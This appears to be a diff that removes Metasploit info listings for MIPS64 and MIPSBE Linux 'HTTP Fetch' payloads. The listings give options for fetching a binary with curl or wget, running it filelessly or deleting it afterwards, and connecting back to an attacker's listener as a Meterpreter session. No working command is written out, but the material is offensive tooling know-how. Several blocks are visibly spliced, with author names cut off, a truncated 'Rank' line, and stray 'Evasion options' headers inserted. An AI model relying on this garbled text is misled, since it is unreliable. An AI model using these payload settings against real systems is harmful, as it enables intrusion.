PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,106 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch
|
||||
Module: payload/cmd/linux/http/mips64/meterpreter_reverse_https
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 105
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
B
|
||||
Evasion options for payload/cmd/linux/http/mips64/meterpreter_reverse_https:
|
||||
=========================
|
||||
|
||||
@rapid7.com>
|
||||
timwr
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The local listener hostname
|
||||
LPORT 8443 yes The local listener port
|
||||
LURI no The HTTP Path
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME nqGcBdJTD no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute a MIPS64 payload from an HTTP server.
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
||||
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StagerVerifySSLCert false no Whether to verify the SSL certificate in Meterpreter
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,97 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch
|
||||
Module: payload/cmd/linux/http/mips64/meterpreter_reverse_tcp
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 108
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Brendan Watters
|
||||
Spencer McIntyre
|
||||
Adam Cammack <adam_cammack@rapid7.com>
|
||||
Brent Cook <brent_cook@rapid7.com>
|
||||
timwr
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME qPigzETmWu no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute a MIPS64 payload from an HTTP server.
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,69 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch, Linux Execute Command
|
||||
Module: payload/cmd/linux/http/mipsbe/exec
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 105
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
Brendan Watters
|
||||
Spencer McIntyre
|
||||
Michael Messner <devnull@s3cur1ty.de>
|
||||
entropy <entropy@phiral.net>
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
CMD yes The command string to execute
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST yes Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME liEefdOwA no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an MIPSBE payload from an HTTP server.
|
||||
|
||||
A very small shellcode for executing commands.
|
||||
This module is sometimes helpful for testing purposes.
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,100 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch, Reverse TCP Stager
|
||||
Module: payload/cmd/linux/http/mipsbe/meterpreter/reverse_tcp
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 105
|
||||
Rank: Norm
|
||||
Evasion options for payload/cmd/linux/http/mipsbe/meterpreter/reverse_tcp:
|
||||
=========================
|
||||
|
||||
juan vazquez <juan.vazquez@metasploit.com>
|
||||
tkmru
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The listen address (an interface may be specified)
|
||||
LPORT 4444 yes The listen port
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME EjqTwHWHT no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an MIPSBE payload from an HTTP server.
|
||||
Connect back to the attacker
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableStageEncoding false no Encode the second stage payload
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
StageEncoder no Encoder to use if EnableStageEncoding is set
|
||||
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
|
||||
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
|
||||
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
|
||||
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,104 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch
|
||||
Module: payload/cmd/linux/http/mipsbe/meterpreter_reverse_http
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 111
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
|
||||
Evasion options for payload/cmd/linux/http/mipsbe/meterpreter_reverse_http:
|
||||
=========================
|
||||
|
||||
ok@rapid7.com>
|
||||
timwr
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The local listener hostname
|
||||
LPORT 8080 yes The local listener port
|
||||
LURI no The HTTP Path
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME OJApyhagJby no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an MIPSBE payload from an HTTP server.
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
FetchHttpServerName Apache yes Fetch HTTP server name
|
||||
FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST
|
||||
FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT
|
||||
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
|
||||
HttpServerName Apache no The server header that the handler will send in response to requests
|
||||
HttpUnknownRequestResponse <html><body><h1>It works!</h1></body></html> no The returned HTML response body when the handler receives a request that is not from a payload
|
||||
HttpUserAgent Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:133.0) Gecko/20100101 Firefox/133.0 no The user-agent that the payload should use for communication Max parameter length: 255 characters
|
||||
IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs
|
||||
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
|
||||
MSI::Custom no Use custom msi instead of automatically generating a payload msi
|
||||
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
|
||||
MSI::Path no The directory in which to look for the msi template
|
||||
MSI::Template no The msi template file name
|
||||
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
|
||||
MeterpreterDebugBuild false no Use a debug version of Meterpreter
|
||||
MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html
|
||||
MeterpreterTryToFork false no Fork a new process if the functionality is available
|
||||
OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests
|
||||
OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests
|
||||
OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT
|
||||
OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https
|
||||
PayloadProcessCommandLine no The displayed command line that will be used by the payload
|
||||
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
|
||||
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
|
||||
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
|
||||
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
|
||||
PingbackRetries 0 yes How many additional successful pingbacks
|
||||
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
|
||||
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
|
||||
ReverseListenerBindAddress no The specific IP address to bind to on the local system
|
||||
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
|
||||
ReverseListenerComm no The specific communication channel to use for this listener
|
||||
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
|
||||
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
|
||||
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
|
||||
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
|
||||
VERBOSE false no Enable detailed status messages
|
||||
WORKSPACE no Specify the workspace for this module
|
||||
|
||||
@@ -1,106 +0,0 @@
|
||||
|
||||
Name: HTTP Fetch
|
||||
Module: payload/cmd/linux/http/mipsbe/meterpreter_reverse_https
|
||||
Platform: Linux
|
||||
Arch: cmd
|
||||
Needs Admin: No
|
||||
Total size: 108
|
||||
Rank: Normal
|
||||
|
||||
Provided by:
|
||||
B
|
||||
Evasion options for payload/cmd/linux/http/mipsbe/meterpreter_reverse_https:
|
||||
=========================
|
||||
|
||||
@rapid7.com>
|
||||
timwr
|
||||
|
||||
Basic options:
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
|
||||
FETCH_DELETE false yes Attempt to delete the binary after execution
|
||||
FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+)
|
||||
FETCH_SRVHOST no Local IP to use for serving payload
|
||||
FETCH_SRVPORT 8080 yes Local port to use for serving payload
|
||||
FETCH_URIPATH no Local URI to use for serving payload
|
||||
LHOST yes The local listener hostname
|
||||
LPORT 8443 yes The local listener port
|
||||
LURI no The HTTP Path
|
||||
|
||||
|
||||
When FETCH_COMMAND is one of CURL,WGET:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell.
|
||||
|
||||
|
||||
When FETCH_FILELESS is none:
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
FETCH_FILENAME ICLFrRDOUN no Name to use on remote system when storing payload; cannot contain spaces or slashes
|
||||
FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces
|
||||
|
||||
Description:
|
||||
Fetch and execute an MIPSBE payload from an HTTP server.
|
||||
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
AutoLoadStdapi true yes Automatically load the Stdapi extension
|
||||
AutoRunScript no A script to run automatically on session creation.
|
||||
AutoSystemInfo true yes Automatically capture system information on initialization.
|
||||
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
|
||||
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
|
||||
EXE::Custom no Use custom exe instead of automatically generating a payload exe
|
||||
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
|
||||
EXE::FallBack false no Use the default template in case the specified one is missing
|
||||
EXE::Inject false no Set to preserve the original EXE function
|
||||
EXE::OldMethod false no Set to use the substitution EXE generation method.
|
||||
EXE::Path no The directory in which to look for the executable template
|
||||
EXE::Template no The executable template file name.
|
||||
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
|
||||
FetchHandlerDisable false yes Disable fetch handler
|
||||
